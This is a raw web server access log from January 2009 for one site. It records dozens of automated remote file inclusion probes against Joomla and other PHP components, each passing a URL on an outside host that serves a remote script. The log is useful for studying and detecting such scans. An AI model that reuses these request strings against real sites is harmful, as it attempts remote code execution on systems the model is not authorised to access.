62.141.37.54 - - [05/Jan/2009:23:37:24 -0800] "GET /logs/access_081215.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:37:26 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:37:53 -0800] "GET /logs/access_081221.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:39:53 -0800] "GET /logs/access_081205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
63.247.65.114 - - [05/Jan/2009:23:42:02 -0800] "GET /logs/access_081209.log/errors.php?error=http://korea-photo.com/bbs/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
63.247.65.114 - - [05/Jan/2009:23:42:02 -0800] "GET /errors.php?error=http://korea-photo.com/bbs/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
63.247.65.114 - - [05/Jan/2009:23:42:02 -0800] "GET /logs/errors.php?error=http://korea-photo.com/bbs/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
63.247.65.114 - - [05/Jan/2009:23:42:02 -0800] "GET /logs/access.log/errors.php?error=http://korea-photo.com/bbs/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
193.25.112.69 - - [05/Jan/2009:23:42:06 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.spongyfeet.com"
193.25.112.69 - - [05/Jan/2009:23:42:06 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.spongyfeet.com"
193.25.112.69 - - [05/Jan/2009:23:42:06 -0800] "GET /logs/access_081218.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:43:03 -0800] "GET /logs/access_081220.log%20//components/com_flyspray/startdown.php?file=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
193.25.112.69 - - [05/Jan/2009:23:43:11 -0800] "GET /logs/access_081207.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:46:41 -0800] "GET /logs/access_081218.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:46:41 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:46:42 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
94.23.10.29 - - [05/Jan/2009:23:48:07 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
94.23.10.29 - - [05/Jan/2009:23:48:07 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:48:10 -0800] "GET /logs/access_081207.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:23:51:30 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:23:51:31 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:23:51:31 -0800] "GET /logs/access_081221.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:23:53:09 -0800] "GET /logs/access_081225.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:23:53:34 -0800] "GET /logs/access_081218.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:23:53:34 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:23:53:34 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.spongyfeet.com"
77.221.130.2 - - [05/Jan/2009:23:54:03 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
77.221.130.2 - - [05/Jan/2009:23:54:03 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:54:10 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:23:55:02 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:23:55:02 -0800] "GET /logs/access_081221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:23:55:03 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:23:55:09 -0800] "GET /logs/access_081207.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.spongyfeet.com"
203.34.37.16 - - [05/Jan/2009:23:55:27 -0800] "GET /include/admin.lib.inc.php?site_path=http://znaes.webs.com/glup.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:56:57 -0800] "GET /path/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:56:58 -0800] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:57:01 -0800] "GET /logs/access.log//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
74.213.164.118 - - [05/Jan/2009:23:57:17 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
74.213.164.118 - - [06/Jan/2009:00:01:45 -0800] "GET /logs/access_081218.log///tools/send_reminders.php?noSet=0&includedir=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
74.213.164.118 - - [06/Jan/2009:00:01:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
74.213.164.118 - - [06/Jan/2009:00:01:46 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.149.85.37 - - [06/Jan/2009:00:02:40 -0800] "GET /logs/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
218.149.85.37 - - [06/Jan/2009:00:02:40 -0800] "GET /errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
203.34.37.16 - - [06/Jan/2009:00:03:40 -0800] "GET /logs/access_081226.log/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
203.34.37.16 - - [06/Jan/2009:00:03:41 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
203.34.37.16 - - [06/Jan/2009:00:03:41 -0800] "GET /logs/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
203.34.37.16 - - [06/Jan/2009:00:04:16 -0800] "GET /logs/access_081207.log/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
222.236.47.182 - - [06/Jan/2009:00:04:20 -0800] "GET /logs/access_081225.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
65.39.182.49 - - [06/Jan/2009:00:04:36 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
65.39.182.49 - - [06/Jan/2009:00:04:36 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
65.39.182.49 - - [06/Jan/2009:00:04:36 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
222.236.47.182 - - [06/Jan/2009:00:05:32 -0800] "GET /logs/access_081222.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
74.213.164.118 - - [06/Jan/2009:00:05:45 -0800] "GET /logs/access.log///tools/send_reminders.php?noSet=0&includedir=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
74.213.164.118 - - [06/Jan/2009:00:05:45 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
74.213.164.118 - - [06/Jan/2009:00:05:45 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
65.39.182.49 - - [06/Jan/2009:00:06:04 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
207.182.137.218 - - [06/Jan/2009:00:07:27 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
207.182.137.218 - - [06/Jan/2009:00:07:27 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
207.182.137.218 - - [06/Jan/2009:00:07:27 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
207.182.137.218 - - [06/Jan/2009:00:09:22 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
74.213.164.118 - - [06/Jan/2009:00:09:49 -0800] "GET /logs/access_081215.log///tools/send_reminders.php?noSet=0&includedir=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
119.235.18.7 - - [06/Jan/2009:00:09:53 -0800] "GET /logs/access_081221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.spongyfeet.com"
119.235.18.7 - - [06/Jan/2009:00:09:53 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.spongyfeet.com"
119.235.18.7 - - [06/Jan/2009:00:09:53 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.spongyfeet.com"
148.245.102.115 - - [06/Jan/2009:00:11:06 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.spongyfeet.com"
148.245.102.115 - - [06/Jan/2009:00:11:06 -0800] "GET /logs/access_081207.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.spongyfeet.com"
148.245.102.115 - - [06/Jan/2009:00:11:06 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.spongyfeet.com"
207.182.137.218 - - [06/Jan/2009:00:11:51 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
207.182.137.218 - - [06/Jan/2009:00:11:51 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
207.182.137.218 - - [06/Jan/2009:00:11:51 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
83.222.23.200 - - [06/Jan/2009:00:12:57 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
207.182.137.218 - - [06/Jan/2009:00:14:33 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
217.115.154.55 - - [06/Jan/2009:00:18:25 -0800] "GET /logs/access_081225.log/includes/ktedit/toolbar.php?dirDepth=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.spongyfeet.com"
217.115.154.55 - - [06/Jan/2009:00:18:25 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.spongyfeet.com"
217.115.154.55 - - [06/Jan/2009:00:18:25 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.spongyfeet.com"
217.115.154.55 - - [06/Jan/2009:00:18:28 -0800] "GET /logs/access.log/includes/ktedit/toolbar.php?dirDepth=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.spongyfeet.com"
119.235.18.7 - - [06/Jan/2009:00:19:11 -0800] "GET /logs/access_081225.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.spongyfeet.com"
74.55.128.226 - - [06/Jan/2009:00:22:19 -0800] "GET /logs/access_081226.log//apboard/index.php?APB_rp=http://ubii.freehostia.com/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.spongyfeet.com"
74.55.128.226 - - [06/Jan/2009:00:22:20 -0800] "GET /apboard/index.php?APB_rp=http://ubii.freehostia.com/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.spongyfeet.com"
83.222.23.200 - - [06/Jan/2009:00:22:20 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
74.55.128.226 - - [06/Jan/2009:00:22:20 -0800] "GET /logs//apboard/index.php?APB_rp=http://ubii.freehostia.com/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.spongyfeet.com"
83.222.23.200 - - [06/Jan/2009:00:22:20 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
217.115.154.55 - - [06/Jan/2009:00:23:00 -0800] "GET /logs/access.log%20/includes/ktedit/toolbar.php?dirDepth=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.spongyfeet.com"
220.95.214.91 - - [06/Jan/2009:00:25:01 -0800] "GET /logs/access_081226.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://morebb.com/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.spongyfeet.com"
220.95.214.91 - - [06/Jan/2009:00:25:01 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://morebb.com/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.spongyfeet.com"
220.95.214.91 - - [06/Jan/2009:00:25:01 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://morebb.com/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.spongyfeet.com"
211.43.205.222 - - [06/Jan/2009:00:28:36 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hassenrasool.com/shop/bod.do???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
211.43.205.222 - - [06/Jan/2009:00:28:36 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hassenrasool.com/shop/bod.do???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
211.43.205.222 - - [06/Jan/2009:00:28:36 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hassenrasool.com/shop/bod.do???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
213.226.166.122 - - [06/Jan/2009:00:31:54 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
213.226.166.122 - - [06/Jan/2009:00:31:55 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
91.121.65.125 - - [06/Jan/2009:00:31:58 -0800] "GET /logs/access_081218.log//apboard/index.php?APB_rp=http://ubii.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
91.121.65.125 - - [06/Jan/2009:00:31:58 -0800] "GET /apboard/index.php?APB_rp=http://ubii.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
91.121.65.125 - - [06/Jan/2009:00:31:58 -0800] "GET /logs//apboard/index.php?APB_rp=http://ubii.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
211.194.5.172 - - [06/Jan/2009:00:32:07 -0800] "GET /logs/access_081225.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.spongyfeet.com"
211.194.5.172 - - [06/Jan/2009:00:32:07 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.spongyfeet.com"
211.194.5.172 - - [06/Jan/2009:00:32:09 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.spongyfeet.com"
218.234.18.127 - - [06/Jan/2009:00:32:14 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
218.234.18.127 - - [06/Jan/2009:00:32:14 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
218.234.18.127 - - [06/Jan/2009:00:32:14 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
211.194.5.172 - - [06/Jan/2009:00:32:36 -0800] "GET /logs/access_081221.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.spongyfeet.com"
74.6.8.103 - - [06/Jan/2009:00:33:51 -0800] "GET /logs/access_080920.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.spongyfeet.com"
